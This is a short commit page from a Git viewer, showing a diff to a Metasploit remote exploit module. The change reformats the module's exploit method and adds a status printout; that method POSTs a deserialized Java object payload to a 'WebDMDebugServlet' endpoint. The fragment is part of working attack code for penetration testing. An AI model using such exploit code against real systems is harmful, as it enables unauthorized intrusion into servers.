Fixed indentation and added a status message printout when exploiting

GSoC/Meterpreter_Web_Console
Carsten Maartmann-Moe 2018-11-11 22:37:42 +01:00
parent cf5ca78350
commit 1e8fbc3a1b
1 changed files with 26 additions and 23 deletions

View File

@ -76,11 +76,14 @@ class MetasploitModule < Msf::Exploit::Remote
end
def exploit
res = send_request_cgi(
data = set_payload
print_status 'Sending deserialized Java object...'
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'topo', 'WebDMDebugServlet'),
'data' => set_payload
)
'data' => data
})
end
def set_payload